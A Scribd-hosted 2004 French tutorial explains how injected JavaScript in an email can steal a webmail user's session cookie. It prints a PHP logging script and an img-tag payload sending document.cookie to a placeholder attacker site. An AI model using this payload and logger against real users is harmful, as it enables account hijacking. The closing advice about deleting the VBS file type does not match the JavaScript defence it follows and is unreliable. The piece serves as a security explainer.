Scribd Logo
Încărcați

Bine ați venit la Scribd!

  • Index 2

    Încărcat de

    Alexis Boulmay
    16 vizualizări1 pagină

    Drepturi de autor

    © Attribution Non-Commercial (BY-NC)

    Formate disponibile

    PDF, TXT sau citiți online pe Scribd

    Vi se pare util acest document?

    Este necorespunzător acest conținut?

    Raportați acest document

    Drepturi de autor:

    Attribution Non-Commercial (BY-NC)
    Descărcați ca PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    16 vizualizări1 pagină

    Index 2

    Încărcat de

    Alexis Boulmay

    Drepturi de autor:

    Attribution Non-Commercial (BY-NC)
    Descărcați ca PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    din 1

    Comment recuperer des cookies

    (20-09-2004) - Soumis par Billard-pool - Dernière mise à jour : (08-09-2005)

    Nous allons voir ici comment il est possible de récupérer le cookie


    d'une cible en lui envoyant simplement un mail contenant un code
    hostile.

    Nous allons ici étudier le code et la méthode employée.

    Pour que le code soit exécuté, il faudra exploiter une faille du webmail visé, mais nous ne verrons pas cela ici.

    La technique : le pirate va d'abord créer un script php qui servira à enregistrer


    le cookie dans un fichier txt sur le ftp, il sera donc placé sur un
    serveur quelconque.

    Code du script recup.php :

    <?
    $fp=fopen("cookie.txt", "a");
    fwrite($fp, "$cookie\n");
    fclose($fp);
    ?>

    Voici ce script commenté :


    1) Ouverture du fichier cookie.txt, il est crée s'il n'existe pas sur le serveur
    2) Ecriture du contenu de la variable $cookie dans le fichier, la
    variable $cookie contiendra le cookie envoyé par le code javascript.
    3) Fermeture du fichier sur le serveur.

    Une fois ce script présent sur le serveur du pirate (donc accessible


    maintenant à l'adresse http://site_du_pirate.com/recup.php).
    Le pirate va maintenant se servir d'un code javascript très simple qui
    va écrire le contenu du cookie dans la variable cookie du script php.
    Pour insérer le Javascript, le pirate va se servir de la balise
    "<img src" , ceci afin que le code hostile passe pour un image
    inoffensive et invisible.

    Code Javascript :<img src="javascript:var ima=new Image(); ima.src='


    http://site_du_pirate.com/recup.php?cookie='+document.cookie">

    Le pirate n'a plu qu'a placer le code Javascript dans la source html de
    son email afin que ce code soit s'exécute à l'ouverture du mail par la
    victime.
    Je viens de vous démontrer ici comme il est simple de se faire voler un cookie simplement en lisant un email !
    Pour parer cette attaque, il suffit de désactiver l'exécution du Javascript dans les options de son navigateur web.

    Désactivation de cette fonction menu Demarrer, Poste de travail,


    Outils, Option des dossiers, Types de fichiers et cherchez VBS scipts,
    cliquez dessus et supprimez le.
    Windows par defaut laisse avec cette fonction une belle entrée à la plupart de tout les virus connus..........
    Grant le 20/09/2004

    http://www.billard-pool-websecurity.com - Billard-pool-websecurity Powered by Mambo Generated: 8 September, 2010, 21:02

    S-ar putea să vă placă și